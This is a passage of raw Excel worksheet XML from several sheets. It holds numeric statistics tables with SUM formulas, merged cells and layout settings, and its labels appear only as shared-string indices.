        <v>442</v>
      </c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21.75" customHeight="1" thickBot="1">
      <c r="A2" s="147"/>
      <c r="B2" s="147"/>
      <c r="C2" s="146"/>
      <c r="D2" s="146"/>
      <c r="E2" s="146"/>
      <c r="F2" s="146"/>
      <c r="G2" s="146"/>
      <c r="H2" s="146"/>
      <c r="I2" s="146"/>
      <c r="J2" s="151" t="s">
        <v>456</v>
      </c>
      <c r="K2" s="151"/>
      <c r="L2" s="151"/>
    </row>
    <row r="3" spans="1:12" ht="21.75" customHeight="1">
      <c r="A3" s="152" t="s">
        <v>441</v>
      </c>
      <c r="B3" s="154" t="s">
        <v>440</v>
      </c>
      <c r="C3" s="156" t="s">
        <v>439</v>
      </c>
      <c r="D3" s="156"/>
      <c r="E3" s="156" t="s">
        <v>438</v>
      </c>
      <c r="F3" s="156"/>
      <c r="G3" s="156" t="s">
        <v>437</v>
      </c>
      <c r="H3" s="156"/>
      <c r="I3" s="156" t="s">
        <v>436</v>
      </c>
      <c r="J3" s="156"/>
      <c r="K3" s="156" t="s">
        <v>435</v>
      </c>
      <c r="L3" s="157"/>
    </row>
    <row r="4" spans="1:12" ht="21.75" customHeight="1">
      <c r="A4" s="153"/>
      <c r="B4" s="155"/>
      <c r="C4" s="145" t="s">
        <v>454</v>
      </c>
      <c r="D4" s="145" t="s">
        <v>434</v>
      </c>
      <c r="E4" s="145" t="s">
        <v>455</v>
      </c>
      <c r="F4" s="145" t="s">
        <v>432</v>
      </c>
      <c r="G4" s="145" t="s">
        <v>455</v>
      </c>
      <c r="H4" s="145" t="s">
        <v>432</v>
      </c>
      <c r="I4" s="145" t="s">
        <v>455</v>
      </c>
      <c r="J4" s="145" t="s">
        <v>433</v>
      </c>
      <c r="K4" s="145" t="s">
        <v>455</v>
      </c>
      <c r="L4" s="144" t="s">
        <v>432</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="21.75" customHeight="1">
      <c r="A5" s="143" t="s">
        <v>431</v>
      </c>
      <c r="B5" s="142">
        <f aca="true" t="shared" si="0" ref="B5:L5">SUM(B6:B16)</f>
        <v>2589304</v>
      </c>
      <c r="C5" s="142">
        <f t="shared" si="0"/>
        <v>480</v>
      </c>
      <c r="D5" s="142">
        <f t="shared" si="0"/>
        <v>16806</v>
      </c>
      <c r="E5" s="142">
        <f t="shared" si="0"/>
        <v>18</v>
      </c>
      <c r="F5" s="142">
        <f t="shared" si="0"/>
        <v>1238</v>
      </c>
      <c r="G5" s="142">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="H5" s="142">
        <f t="shared" si="0"/>
        <v>32413</v>
      </c>
      <c r="I5" s="142">
        <f t="shared" si="0"/>
        <v>41</v>
      </c>
      <c r="J5" s="142">
        <f t="shared" si="0"/>
        <v>2219767</v>
      </c>
      <c r="K5" s="142">
        <f t="shared" si="0"/>
        <v>21</v>
      </c>
      <c r="L5" s="141">
        <f t="shared" si="0"/>
        <v>319080</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="21.75" customHeight="1">
      <c r="A6" s="140" t="s">
        <v>443</v>
      </c>
      <c r="B6" s="139">
        <f aca="true" t="shared" si="1" ref="B6:B16">SUM(D6,F6,H6,J6,L6)</f>
        <v>109737</v>
      </c>
      <c r="C6" s="139">
        <v>49</v>
      </c>
      <c r="D6" s="139">
        <v>2071</v>
      </c>
      <c r="E6" s="139">
        <v>0</v>
      </c>
      <c r="F6" s="139">
        <v>0</v>
      </c>
      <c r="G6" s="139">
        <v>2</v>
      </c>
      <c r="H6" s="139">
        <v>1695</v>
      </c>
      <c r="I6" s="139">
        <v>3</v>
      </c>
      <c r="J6" s="139">
        <v>92100</v>
      </c>
      <c r="K6" s="139">
        <v>3</v>
      </c>
      <c r="L6" s="138">
        <v>13871</v>
      </c>
    </row>
    <row r="7" spans="1:12" ht="21.75" customHeight="1">
      <c r="A7" s="140" t="s">
        <v>444</v>
      </c>
      <c r="B7" s="139">
        <f t="shared" si="1"/>
        <v>98371</v>
      </c>
      <c r="C7" s="139">
        <v>15</v>
      </c>
      <c r="D7" s="139">
        <v>371</v>
      </c>
      <c r="E7" s="139">
        <v>0</v>
      </c>
      <c r="F7" s="139">
        <v>0</v>
      </c>
      <c r="G7" s="139">
        <v>0</v>
      </c>
      <c r="H7" s="139">
        <v>0</v>
      </c>
      <c r="I7" s="139">
        <v>3</v>
      </c>
      <c r="J7" s="139">
        <v>98000</v>
      </c>
      <c r="K7" s="139">
        <v>0</v>
      </c>
      <c r="L7" s="138">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:12" ht="21.75" customHeight="1">
      <c r="A8" s="140" t="s">
        <v>445</v>
      </c>
      <c r="B8" s="139">
        <f t="shared" si="1"/>
        <v>113243</v>
      </c>
      <c r="C8" s="139">
        <v>30</v>
      </c>
      <c r="D8" s="139">
        <v>458</v>
      </c>
      <c r="E8" s="139">
        <v>1</v>
      </c>
      <c r="F8" s="139">
        <v>85</v>
      </c>
      <c r="G8" s="139">
        <v>2</v>
      </c>
      <c r="H8" s="139">
        <v>2200</v>
      </c>
      <c r="I8" s="139">
        <v>2</v>
      </c>
      <c r="J8" s="139">
        <v>92500</v>
      </c>
      <c r="K8" s="139">
        <v>1</v>
      </c>
      <c r="L8" s="138">
        <v>18000</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="21.75" customHeight="1">
      <c r="A9" s="140" t="s">
        <v>446</v>
      </c>
      <c r="B9" s="139">
        <f t="shared" si="1"/>
        <v>175342</v>
      </c>
      <c r="C9" s="139">
        <v>46</v>
      </c>
      <c r="D9" s="139">
        <v>888</v>
      </c>
      <c r="E9" s="139">
        <v>4</v>
      </c>
      <c r="F9" s="139">
        <v>397</v>
      </c>
      <c r="G9" s="139">
        <v>2</v>
      </c>
      <c r="H9" s="139">
        <v>990</v>
      </c>
      <c r="I9" s="139">
        <v>3</v>
      </c>
      <c r="J9" s="139">
        <v>106567</v>
      </c>
      <c r="K9" s="139">
        <v>4</v>
      </c>
      <c r="L9" s="138">
        <v>66500</v>
      </c>
    </row>
    <row r="10" spans="1:12" ht="21.75" customHeight="1">
      <c r="A10" s="140" t="s">
        <v>447</v>
      </c>
      <c r="B10" s="139">
        <f t="shared" si="1"/>
        <v>505464</v>
      </c>
      <c r="C10" s="139">
        <v>61</v>
      </c>
      <c r="D10" s="139">
        <v>2449</v>
      </c>
      <c r="E10" s="139">
        <v>2</v>
      </c>
      <c r="F10" s="139">
        <v>165</v>
      </c>
      <c r="G10" s="139">
        <v>1</v>
      </c>
      <c r="H10" s="139">
        <v>1350</v>
      </c>
      <c r="I10" s="139">
        <v>6</v>
      </c>
      <c r="J10" s="139">
        <v>455000</v>
      </c>
      <c r="K10" s="139">
        <v>5</v>
      </c>
      <c r="L10" s="138">
        <v>46500</v>
      </c>
    </row>
    <row r="11" spans="1:12" ht="21.75" customHeight="1">
      <c r="A11" s="140" t="s">
        <v>448</v>
      </c>
      <c r="B11" s="139">
        <f t="shared" si="1"/>
        <v>173723</v>
      </c>
      <c r="C11" s="139">
        <v>42</v>
      </c>
      <c r="D11" s="139">
        <v>606</v>
      </c>
      <c r="E11" s="139">
        <v>3</v>
      </c>
      <c r="F11" s="139">
        <v>187</v>
      </c>
      <c r="G11" s="139">
        <v>3</v>
      </c>
      <c r="H11" s="139">
        <v>7930</v>
      </c>
      <c r="I11" s="139">
        <v>3</v>
      </c>
      <c r="J11" s="139">
        <v>165000</v>
      </c>
      <c r="K11" s="139">
        <v>0</v>
      </c>
      <c r="L11" s="138">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:12" ht="21.75" customHeight="1">
      <c r="A12" s="140" t="s">
        <v>449</v>
      </c>
      <c r="B12" s="139">
        <f t="shared" si="1"/>
        <v>210929</v>
      </c>
      <c r="C12" s="139">
        <v>39</v>
      </c>
      <c r="D12" s="139">
        <v>1829</v>
      </c>
      <c r="E12" s="139">
        <v>0</v>
      </c>
      <c r="F12" s="139">
        <v>0</v>
      </c>
      <c r="G12" s="139">
        <v>1</v>
      </c>
      <c r="H12" s="139">
        <v>2800</v>
      </c>
      <c r="I12" s="139">
        <v>5</v>
      </c>
      <c r="J12" s="139">
        <v>180800</v>
      </c>
      <c r="K12" s="139">
        <v>1</v>
      </c>
      <c r="L12" s="138">
        <v>25500</v>
      </c>
    </row>
    <row r="13" spans="1:12" ht="21.75" customHeight="1">
      <c r="A13" s="140" t="s">
        <v>450</v>
      </c>
      <c r="B13" s="139">
        <f t="shared" si="1"/>
        <v>239385</v>
      </c>
      <c r="C13" s="139">
        <v>73</v>
      </c>
      <c r="D13" s="139">
        <v>2359</v>
      </c>
      <c r="E13" s="139">
        <v>4</v>
      </c>
      <c r="F13" s="139">
        <v>78</v>
      </c>
      <c r="G13" s="139">
        <v>1</v>
      </c>
      <c r="H13" s="139">
        <v>948</v>
      </c>
      <c r="I13" s="139">
        <v>4</v>
      </c>
      <c r="J13" s="139">
        <v>236000</v>
      </c>
      <c r="K13" s="139">
        <v>0</v>
      </c>
      <c r="L13" s="138">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:12" ht="21.75" customHeight="1">
      <c r="A14" s="140" t="s">
        <v>451</v>
      </c>
      <c r="B14" s="139">
        <f t="shared" si="1"/>
        <v>457362</v>
      </c>
      <c r="C14" s="139">
        <v>33</v>
      </c>
      <c r="D14" s="139">
        <v>691</v>
      </c>
      <c r="E14" s="139">
        <v>1</v>
      </c>
      <c r="F14" s="139">
        <v>69</v>
      </c>
      <c r="G14" s="139">
        <v>0</v>
      </c>
      <c r="H14" s="139">
        <v>3200</v>
      </c>
      <c r="I14" s="139">
        <v>6</v>
      </c>
      <c r="J14" s="139">
        <v>381000</v>
      </c>
      <c r="K14" s="139">
        <v>2</v>
      </c>
      <c r="L14" s="138">
        <v>72402</v>
      </c>
    </row>
    <row r="15" spans="1:12" ht="21.75" customHeight="1">
      <c r="A15" s="140" t="s">
        <v>452</v>
      </c>
      <c r="B15" s="139">
        <f t="shared" si="1"/>
        <v>422999</v>
      </c>
      <c r="C15" s="139">
        <v>66</v>
      </c>
      <c r="D15" s="139">
        <v>3142</v>
      </c>
      <c r="E15" s="139">
        <v>3</v>
      </c>
      <c r="F15" s="139">
        <v>257</v>
      </c>
      <c r="G15" s="139">
        <v>1</v>
      </c>
      <c r="H15" s="139">
        <v>8300</v>
      </c>
      <c r="I15" s="139">
        <v>3</v>
      </c>
      <c r="J15" s="139">
        <v>352000</v>
      </c>
      <c r="K15" s="139">
        <v>3</v>
      </c>
      <c r="L15" s="138">
        <v>59300</v>
      </c>
    </row>
    <row r="16" spans="1:12" ht="21.75" customHeight="1" thickBot="1">
      <c r="A16" s="140" t="s">
        <v>453</v>
      </c>
      <c r="B16" s="139">
        <f t="shared" si="1"/>
        <v>82749</v>
      </c>
      <c r="C16" s="139">
        <v>26</v>
      </c>
      <c r="D16" s="139">
        <v>1942</v>
      </c>
      <c r="E16" s="139">
        <v>0</v>
      </c>
      <c r="F16" s="139">
        <v>0</v>
      </c>
      <c r="G16" s="139">
        <v>1</v>
      </c>
      <c r="H16" s="139">
        <v>3000</v>
      </c>
      <c r="I16" s="139">
        <v>3</v>
      </c>
      <c r="J16" s="139">
        <v>60800</v>
      </c>
      <c r="K16" s="139">
        <v>2</v>
      </c>
      <c r="L16" s="138">
        <v>17007</v>
      </c>
    </row>
    <row r="17" spans="1:12" ht="14.25">
      <c r="A17" s="148" t="s">
        <v>430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</row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="10">
    <mergeCell ref="A17:L17"/>
    <mergeCell ref="A1:L1"/>
    <mergeCell ref="J2:L2"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:B4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16"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="75" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B16" sqref="B16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.50390625" style="1" customWidth="1"/>
    <col min="2" max="2" width="9.75390625" style="1" customWidth="1"/>
    <col min="3" max="3" width="9.25390625" style="1" customWidth="1"/>
    <col min="4" max="4" width="8.875" style="1" customWidth="1"/>
    <col min="5" max="5" width="8.625" style="1" customWidth="1"/>
    <col min="6" max="6" width="8.00390625" style="1" customWidth="1"/>
    <col min="7" max="8" width="8.75390625" style="1" customWidth="1"/>
    <col min="9" max="9" width="8.50390625" style="1" customWidth="1"/>
    <col min="10" max="10" width="9.25390625" style="1" customWidth="1"/>
    <col min="11" max="11" width="9.375" style="1" customWidth="1"/>
    <col min="12" max="12" width="9.00390625" style="1" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="10.25390625" style="1" customWidth="1"/>
    <col min="14" max="14" width="11.375" style="1" customWidth="1"/>
    <col min="15" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14" s="12" customFormat="1" ht="20.25" customHeight="1">
      <c r="A1" s="180" t="s">
        <v>407</v>
      </c>
      <c r="B1" s="180"/>
      <c r="C1" s="180"/>
      <c r="D1" s="18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2" customFormat="1" ht="20.25" customHeight="1">
      <c r="A2" s="74"/>
      <c r="B2" s="74"/>
      <c r="C2" s="74"/>
      <c r="D2" s="74"/>
      <c r="E2" s="74"/>
      <c r="F2" s="74"/>
      <c r="G2" s="10"/>
      <c r="H2" s="10"/>
      <c r="I2" s="10"/>
      <c r="J2" s="10"/>
      <c r="K2" s="10"/>
      <c r="L2" s="10"/>
      <c r="M2" s="194" t="s">
        <v>331</v>
      </c>
      <c r="N2" s="194"/>
    </row>
    <row r="3" spans="1:14" ht="20.25" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>179</v>
      </c>
      <c r="B3" s="179" t="s">
        <v>102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6" ht="20.25" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="62" t="s">
        <v>0</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>17</v>
      </c>
      <c r="D4" s="63" t="s">
        <v>1</v>
      </c>
      <c r="E4" s="64" t="s">
        <v>88</v>
      </c>
      <c r="F4" s="64" t="s">
        <v>89</v>
      </c>
      <c r="G4" s="64" t="s">
        <v>4</v>
      </c>
      <c r="H4" s="64" t="s">
        <v>19</v>
      </c>
      <c r="I4" s="64" t="s">
        <v>20</v>
      </c>
      <c r="J4" s="64" t="s">
        <v>90</v>
      </c>
      <c r="K4" s="64" t="s">
        <v>91</v>
      </c>
      <c r="L4" s="64" t="s">
        <v>7</v>
      </c>
      <c r="M4" s="64" t="s">
        <v>296</v>
      </c>
      <c r="N4" s="64" t="s">
        <v>93</v>
      </c>
      <c r="P4" s="2"/>
    </row>
    <row r="5" spans="1:15" ht="15" customHeight="1">
      <c r="A5" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="65">
        <f aca="true" t="shared" si="0" ref="B5:N5">SUM(B6:B16)</f>
        <v>90</v>
      </c>
      <c r="C5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G5" s="65">
        <f t="shared" si="0"/>
        <v>90</v>
      </c>
      <c r="H5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="M5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="N5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="O5" s="17"/>
    </row>
    <row r="6" spans="1:15" ht="15" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="73">
        <f>SUM(C6:N6)</f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6"/>
    </row>
    <row r="7" spans="1:15" ht="15" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="73">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:N7)</f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6"/>
    </row>
    <row r="8" spans="1:15" ht="15" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="73">
        <f t="shared" si="1"/>
        <v>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6"/>
    </row>
    <row r="9" spans="1:15" ht="15" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="73">
        <f t="shared" si="1"/>
        <v>0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6"/>
    </row>
    <row r="10" spans="1:15" ht="15" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="73">
        <f t="shared" si="1"/>
        <v>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6"/>
    </row>
    <row r="11" spans="1:15" ht="15" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="73">
        <f t="shared" si="1"/>
        <v>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6"/>
    </row>
    <row r="12" spans="1:15" ht="15" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="73">
        <f t="shared" si="1"/>
        <v>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6"/>
    </row>
    <row r="13" spans="1:15" ht="15" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="73">
        <f t="shared" si="1"/>
        <v>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6"/>
    </row>
    <row r="14" spans="1:15" ht="15" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="73">
        <f t="shared" si="1"/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6"/>
    </row>
    <row r="15" spans="1:15" ht="15" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="73">
        <f t="shared" si="1"/>
        <v>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6"/>
    </row>
    <row r="16" spans="1:15" ht="15" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="73">
        <f t="shared" si="1"/>
        <v>90</v>
      </c>
      <c r="C16" s="13"/>
      <c r="D16" s="13"/>
      <c r="E16" s="13"/>
      <c r="F16" s="13"/>
      <c r="G16" s="13">
        <v>90</v>
      </c>
      <c r="H16" s="13"/>
      <c r="I16" s="13"/>
      <c r="J16" s="13"/>
      <c r="K16" s="13"/>
      <c r="L16" s="13"/>
      <c r="M16" s="13"/>
      <c r="N16" s="13"/>
      <c r="O16" s="16"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="4">
    <mergeCell ref="B3:N3"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="A1:D1"/>
    <mergeCell ref="M2:N2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.7086614173228347" right="0.03937007874015748" top="0.7874015748031497" bottom="0.5905511811023623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17"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="6" topLeftCell="A7" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B17" sqref="B17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.50390625" style="1" customWidth="1"/>
    <col min="2" max="2" width="7.75390625" style="1" customWidth="1"/>
    <col min="3" max="3" width="8.00390625" style="1" customWidth="1"/>
    <col min="4" max="4" width="8.25390625" style="1" customWidth="1"/>
    <col min="5" max="5" width="7.75390625" style="1" customWidth="1"/>
    <col min="6" max="6" width="7.25390625" style="1" customWidth="1"/>
    <col min="7" max="7" width="8.00390625" style="1" customWidth="1"/>
    <col min="8" max="8" width="8.625" style="1" customWidth="1"/>
    <col min="9" max="9" width="8.50390625" style="1" customWidth="1"/>
    <col min="10" max="10" width="7.625" style="1" customWidth="1"/>
    <col min="11" max="11" width="5.875" style="1" customWidth="1"/>
    <col min="12" max="12" width="6.50390625" style="1" customWidth="1"/>
    <col min="13" max="13" width="5.375" style="1" customWidth="1"/>
    <col min="14" max="14" width="5.875" style="1" customWidth="1"/>
    <col min="15" max="15" width="7.125" style="1" customWidth="1"/>
    <col min="16" max="18" width="7.625" style="1" customWidth="1"/>
    <col min="19" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:18" ht="20.25" customHeight="1">
      <c r="A1" s="180" t="s">
        <v>408</v>
      </c>
      <c r="B1" s="180"/>
      <c r="C1" s="180"/>
      <c r="D1" s="180"/>
      <c r="E1" s="180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20.25" customHeight="1">
      <c r="A2" s="74"/>
      <c r="B2" s="74"/>
      <c r="C2" s="74"/>
      <c r="D2" s="74"/>
      <c r="E2" s="74"/>
      <c r="F2" s="11"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="5"/>
      <c r="J2" s="5"/>
      <c r="K2" s="5"/>
      <c r="L2" s="5"/>
      <c r="M2" s="5"/>
      <c r="N2" s="5"/>
      <c r="O2" s="5"/>
      <c r="P2" s="5"/>
      <c r="Q2" s="5" t="s">
        <v>331</v>
      </c>
      <c r="R2" s="5"/>
    </row>
    <row r="3" spans="1:18" ht="18.75" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>179</v>
      </c>
      <c r="B3" s="66" t="s">
        <v>9</v>
      </c>
      <c r="C3" s="66"/>
      <c r="D3" s="66"/>
      <c r="E3" s="66"/>
      <c r="F3" s="66"/>
      <c r="G3" s="66"/>
      <c r="H3" s="66"/>
      <c r="I3" s="66"/>
      <c r="J3" s="66"/>
      <c r="K3" s="66" t="s">
        <v>82</v>
      </c>
      <c r="L3" s="66"/>
      <c r="M3" s="66"/>
      <c r="N3" s="66"/>
      <c r="O3" s="66"/>
      <c r="P3" s="66"/>
      <c r="Q3" s="66"/>
      <c r="R3" s="66"/>
    </row>
    <row r="4" spans="1:18" ht="18.75" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="66" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="66"/>
      <c r="D4" s="66"/>
      <c r="E4" s="66" t="s">
        <v>94</v>
      </c>
      <c r="F4" s="66"/>
      <c r="G4" s="66"/>
      <c r="H4" s="66" t="s">
        <v>95</v>
      </c>
      <c r="I4" s="66"/>
      <c r="J4" s="66"/>
      <c r="K4" s="195" t="s">
        <v>96</v>
      </c>
      <c r="L4" s="66" t="s">
        <v>97</v>
      </c>
      <c r="M4" s="66"/>
      <c r="N4" s="66"/>
      <c r="O4" s="66"/>
      <c r="P4" s="179" t="s">
        <v>98</v>
      </c>
      <c r="Q4" s="179" t="s">
        <v>99</v>
      </c>
      <c r="R4" s="179" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="5" spans="1:20" ht="18.75" customHeight="1">
      <c r="A5" s="179"/>
      <c r="B5" s="62" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="62" t="s">
        <v>13</v>
      </c>
      <c r="D5" s="63" t="s">
        <v>10</v>
      </c>
      <c r="E5" s="64" t="s">
        <v>12</v>
      </c>
      <c r="F5" s="64" t="s">
        <v>13</v>
      </c>
      <c r="G5" s="64" t="s">
        <v>10</v>
      </c>
      <c r="H5" s="64" t="s">
        <v>12</v>
      </c>
      <c r="I5" s="64" t="s">
        <v>13</v>
      </c>
      <c r="J5" s="64" t="s">
        <v>10</v>
      </c>
      <c r="K5" s="196"/>
      <c r="L5" s="64" t="s">
        <v>100</v>
      </c>
      <c r="M5" s="64" t="s">
        <v>101</v>
      </c>
      <c r="N5" s="64" t="s">
        <v>99</v>
      </c>
      <c r="O5" s="64" t="s">
        <v>10</v>
      </c>
      <c r="P5" s="182"/>
      <c r="Q5" s="182"/>
      <c r="R5" s="182"/>
      <c r="T5" s="2"/>
    </row>
    <row r="6" spans="1:19" ht="16.5" customHeight="1">
      <c r="A6" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="65">
        <f>SUM(B7:B17)</f>
        <v>70</v>
      </c>
      <c r="C6" s="65">
        <f>SUM(C7:C17)</f>
        <v>20</v>
      </c>
      <c r="D6" s="65">
        <f>SUM(D7:D17)</f>
        <v>90</v>
      </c>
      <c r="E6" s="65">
        <f>SUM(E7:E17)</f>
        <v>0</v>
      </c>
      <c r="F6" s="65">
        <f>SUM(F7:F17)</f>
        <v>0</v>
      </c>
      <c r="G6" s="65">
        <f>SUM(E6:F6)</f>
        <v>0</v>
      </c>
      <c r="H6" s="65">
        <f aca="true" t="shared" si="0" ref="H6:N6">SUM(H7:H17)</f>
        <v>70</v>
      </c>
      <c r="I6" s="65">
        <f t="shared" si="0"/>
        <v>20</v>
      </c>
      <c r="J6" s="65">
        <f t="shared" si="0"/>
        <v>90</v>
      </c>
      <c r="K6" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L6" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="M6" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="N6" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="O6" s="65">
        <f>SUM(L6:N6)</f>
        <v>0</v>
      </c>
      <c r="P6" s="65">
        <f>SUM(P7:P17)</f>
        <v>90</v>
      </c>
      <c r="Q6" s="65">
        <f>SUM(Q7:Q17)</f>
        <v>0</v>
      </c>
      <c r="R6" s="65">
        <f>SUM(R7:R17)</f>
        <v>90</v>
      </c>
      <c r="S6" s="18"/>
    </row>
    <row r="7" spans="1:18" ht="16.5" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="109">
        <f>SUM(E7,H7)</f>
        <v>0</v>
      </c>
      <c r="C7" s="109">
        <f>SUM(F7,I7)</f>
        <v>0</v>
      </c>
      <c r="D7" s="111">
        <f>SUM(B7:C7)</f>
        <v>0</v>
      </c>
      <c r="E7" s="13"/>
      <c r="F7" s="13"/>
      <c r="G7" s="112">
        <f aca="true" t="shared" si="1" ref="G7:G16">SUM(E7:F7)</f>
        <v>0</v>
      </c>
      <c r="H7" s="13"/>
      <c r="I7" s="13"/>
      <c r="J7" s="110">
        <f>SUM(H7:I7)</f>
        <v>0</v>
      </c>
      <c r="K7" s="13"/>
      <c r="L7" s="13"/>
      <c r="M7" s="13"/>
      <c r="N7" s="13"/>
      <c r="O7" s="110">
        <f aca="true" t="shared" si="2" ref="O7:O16">SUM(L7:N7)</f>
        <v>0</v>
      </c>
      <c r="P7" s="13"/>
      <c r="Q7" s="13"/>
      <c r="R7" s="71">
        <f aca="true" t="shared" si="3" ref="R7:R16">SUM(K7,O7,P7,Q7)</f>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:19" ht="16.5" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="109">
        <f aca="true" t="shared" si="4" ref="B8:B17">SUM(E8,H8)</f>
        <v>0</v>
      </c>
      <c r="C8" s="109">
        <f aca="true" t="shared" si="5" ref="C8:C17">SUM(F8,I8)</f>
        <v>0</v>
      </c>
      <c r="D8" s="111">
        <f aca="true" t="shared" si="6" ref="D8:D17">SUM(B8:C8)</f>
        <v>0</v>
      </c>
      <c r="E8" s="13"/>
      <c r="F8" s="13"/>
      <c r="G8" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H8" s="13"/>
      <c r="I8" s="13"/>
      <c r="J8" s="110">
        <f aca="true" t="shared" si="7" ref="J8:J16">SUM(H8:I8)</f>
        <v>0</v>
      </c>
      <c r="K8" s="13"/>
      <c r="L8" s="13"/>
      <c r="M8" s="13"/>
      <c r="N8" s="13"/>
      <c r="O8" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P8" s="13"/>
      <c r="Q8" s="13"/>
      <c r="R8" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S8" s="16"/>
    </row>
    <row r="9" spans="1:19" ht="16.5" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="109">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C9" s="109">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D9" s="111">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="110">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K9" s="13"/>
      <c r="L9" s="13"/>
      <c r="M9" s="13"/>
      <c r="N9" s="13"/>
      <c r="O9" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P9" s="13"/>
      <c r="Q9" s="13"/>
      <c r="R9" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S9" s="16"/>
    </row>
    <row r="10" spans="1:19" ht="16.5" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="109">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C10" s="109">
        <f t="shared" si="5"/>
        <v>0</v>
